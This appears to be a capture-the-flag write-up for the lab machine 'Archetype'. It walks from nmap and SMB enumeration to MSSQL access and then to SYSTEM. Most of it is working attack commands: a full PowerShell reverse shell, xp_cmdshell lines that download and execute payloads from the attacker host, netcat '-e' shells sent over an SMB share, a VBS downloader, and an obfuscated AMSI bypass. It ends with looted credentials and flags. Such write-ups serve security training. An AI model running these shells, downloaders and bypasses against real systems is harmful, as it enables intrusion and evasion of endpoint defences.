# Recon
```Bash
ports=$(nmap -p- --min-rate=1000  -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.27
```


```PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-03-24T23:00:14
| Not valid after:  2051-03-24T23:00:14
|_ssl-date: 2021-03-25T00:29:31+00:00; +21m11s from scanner time.
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h45m12s, deviation: 3h07m52s, median: 21m10s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-03-24T17:29:26-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-03-25T00:29:22
|_  start_date: N/A
```

**OS** - Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
**Share_Folders** -  /backups
**MsSQL** - port 1433  - Microsoft SQL Server 2017
**Win-RM** - port 5985

# Share_Folders
```Bash
smbclient -L 10.10.10.27
```

![](img/Pasted%20image%2020210324231820.png)

```Bash
smbclient //10.10.10.27/backups
```


![](img/Pasted%20image%2020210324232140.png)

# MsSQL

## mssqlclient
```Bash
impacket-mssqlclient ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
```

![](img/Pasted%20image%2020210324233750.png)

While running testing powershell shesls noticed AMSI was blocking the code. Found AMSI bypass powershell reverse shell from:
https://0xdarkvortex.dev/index.php/2019/07/17/red-team-ttps-part-1-amsi-evasion/

### powershell reverse-shell: hax.ps1
```Powershell
$client = New-Object System.Net.Sockets.TCPClient("10.10.15.44",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

host the hax.ps1 file with a python webserver
```Bash
sudo python3 -m http.server 80
```
setup a netcat listener
```Bash
nc -lvnp 1234
```

Run the xp_cmdshell comands:
```Bash
enable_xp_cmdshell
```
`# enables xp_cmdshell`
```Bash
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.15.44/hax.ps1\");"
``` 
`# downloads revshell into memory bypassing AMSI`

![](img/Pasted%20image%2020210324235338.png)

grab the user.txt contents

![](img/Pasted%20image%2020210324235423.png)

read the Powershell History
![](img/Pasted%20image%2020210324235613.png)


## Metasploit
![](img/Pasted%20image%2020210324233435.png)
![](img/Pasted%20image%2020210324233606.png)

# File_Copying_From_SMB

on attack machine:
```Bash
sudo impacket-smbserver illwill /usr/share/windows-resources/binaries/ -smb2support -username sql_svc -password M3g4c0rp123

nc -lvnp 9001
```

In second console window on attacker machine
```Bash
impacket-mssqlclient ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
```


while in mssqlclient console
```Bash
enable_xp_cmdshell
xp_cmdshell "mkdir c:\illwill"
xp_cmdshell "copy \\10.10.15.44\illwill\nc.exe c:\illwill\"
xp_cmdshell "c:\illwill\nc.exe 10.10.15.44 9001 -e powershell.exe"
```
or a nice one-liner
```Bash
xp_cmdshell "mkdir c:\illwill && copy \\10.10.15.44\illwill\nc.exe c:\illwill\ && c:\illwill\nc.exe 10.10.15.44 9001 -e powershell.exe"
```

Connectback from Netcat without needing powershell AMSI bypass  :)

![](img/Pasted%20image%2020210325004903.png)

![](img/Pasted%20image%2020210325003700.png)

**UPDATE:** dont need to copy the file directly 
```Bash
impacket-smbserver illwill /usr/share/windows-resources/binaries/ -smb2support -username sql_svc -password M3g4c0rp123
xp_cmdshell \\10.10.15.44\illwill\nc.exe 10.10.15.44 1234 -e cmd.exe
```

## COPYING FROM METASPLOIT
![](img/Pasted%20image%2020210325010224.png)

## Downloading using VBS ADODB.Stream
```Bash
sudo apt-get install freetds-bin 
nano ~/.freetds.conf
```

paste this in nano:
```
[archetype]
host = 10.10.10.27
port = 1433
tds version = 7.4
```

Use tsql client to connect:
```Bash
tsql -S archetype -U archtype\\sql_svc
```
each line seperately and hit enter:
```Bash
EXEC sp_configure 'xp_cmdshell', 1; 
```
```Bash
GO
```
```Bash
EXEC xp_cmdshell 'cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>%temp%\illwill.vbs &@echo objXMLHTTP.open "GET","http://10.10.15.44/netcat.exe",false>>%temp%\illwill.vbs&@echo objXMLHTTP.send()>>%temp%\illwill.vbs&@echo If objXMLHTTP.Status=200 Then>>%temp%\illwill.vbs&@echo Set objADOStream=CreateObject("ADODB.Stream")>>%temp%\illwill.vbs&@echo objADOStream.Open>>%temp%\illwill.vbs&@echo objADOStream.Type=1 >>%temp%\illwill.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>%temp%\illwill.vbs&@echo objADOStream.Position=0 >>%temp%\illwill.vbs&@echo objADOStream.SaveToFile "%temp%\netcat.exe">>%temp%\illwill.vbs&@echo objADOStream.Close>>%temp%\illwill.vbs&@echo Set objADOStream=Nothing>>%temp%\illwill.vbs&@echo End if>>%temp%\illwill.vbs&@echo Set objXMLHTTP=Nothing>>%temp%\illwill.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>%temp%\illwill.vbs&@echo objShell.Exec("%temp%\netcat.exe 10.10.15.44 1234 -e cmd.exe")>>%temp%\illwill.vbs&cscript.exe %temp%\illwill.vbs"';
```
```Bash
GO
```

## BOOM

![](img/Pasted%20image%2020210325022324.png)

# Loot
**User** = ARCHETYPE\sql_svc
**Password** = M3g4c0rp123

**User** = ARCHETYPE\administrator MEGACORP_4dm1n!!
**Password** = MEGACORP_4dm1n!!

**user_flag**: 3e7b102e78218e935bf3f4951fec21a3

![](img/Pasted%20image%2020210324235613.png)

**root_flag**: b91ccec3305e98240082d4474b848528

![](img/Pasted%20image%2020210324232628.png)


# AMSI_bypass


## Amsi ByPass

```Powershell
$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils'); $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
```

```Powershell
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.44/powercat.ps1');powercat -c 10.10.15.44 -p 1234 -e cmd
```

ON Attacker Box:
```python3 -m http.server 80```
![](img/Pasted%20image%2020210325013629.png)
